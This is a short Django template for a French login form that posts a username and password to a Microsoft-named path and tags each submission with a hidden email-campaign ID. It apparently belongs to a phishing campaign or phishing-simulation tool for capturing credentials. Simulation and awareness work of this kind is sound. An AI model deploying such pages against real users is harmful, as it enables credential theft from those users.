<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Formulaire de Connexion</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        form {
            background-color: #fff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        label {
            display: block;
            margin-bottom: 8px;
        }
        input {
            width: 100%;
            padding: 8px;
            margin-bottom: 12px;
            box-sizing: border-box;
        }
        button {
            background-color: #4caf50;
            color: white;
            padding: 10px 15px;
            border: none;
            border-radius: 3px;
            cursor: pointer;
        }
    </style>
</head>
<body>

    <form action="/info/microsoft/submit" method="post">
        {% csrf_token %}
        <input type="hidden" name="email_campagne_id" value="{{ email_campagne_id }}">
        <label for="username">Nom d'utilisateur:</label>
        <input type="text" id="username" name="username" required>
    
        <label for="password">Mot de passe:</label>
        <input type="password" id="password" name="password" required>
    
        <button type="submit">Se Connecter</button>
    </form>

</body>
</html>